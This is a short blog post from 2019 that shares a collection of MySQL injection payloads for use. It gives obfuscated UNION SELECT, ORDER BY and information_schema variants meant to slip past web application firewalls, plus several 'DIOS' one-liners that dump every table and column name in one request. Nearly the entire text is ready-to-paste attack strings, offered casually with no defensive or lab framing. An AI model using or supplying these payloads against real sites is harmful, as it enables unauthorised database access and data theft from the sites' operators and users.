SQL Injection - Collection of DIOS and WAF Bypasses (Complete)
Monday, November 4, 2019
I'm going to share the collection of DIOS and WAF bypasses that I often use; rather than keeping them to myself, I'd rather spread them around, right baby :v
Just grab them, bro :v
Order by :
/**/ORDER/**/BY/**/
/*!order*/+/*!by*/
Union Select :
/*!50000%55nIoN*/ /*!50000%53eLeCt*/
%55nion(%53elect 1,2,3)-- -
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
/*!UnIoN*/SeLecT+
Information_schema.tables :
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()-- -
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like schEMA()-- -
/*!FrOm*/+information_schema./**/columns+/*!12345Where*/+/*!%54able_name*/ like hex table
Concat :
CoNcAt()
concat()
CON%08CAT()
unhex(hex(/*!50000concat*/(table_name)))
Group_Concat :
/*!group_concat*/()
gRoUp_cOnCAt()
group_concat(/*!*/)
convert(group_concat(/*!table_name*/)+using+ascii)
DIOS by Profexer a Russian Hacker:
(select(@)from(select(@:=0x00),(select(@)from(information_schema.columns)where(@)in(@:=concat(@,0x3C62723E,table_name,0x3a,column_name))))a)
DIOS by Dr.Z3ro:
(select(select concat(@:=0xa7,(select count(*)from(information_schema.columns)where(@:=concat(@,0x3c6c693e,table_name,0x3a,column_name))),@)))
DIOS by M@dBlood
(Select export_set(5,@:=0,(select count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2))
Shortest DIOS
make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@)
That's all for now, friends :D, if I have time tomorrow I'll add more DIOS.
Thank you to everyone who read this.
Happy play security code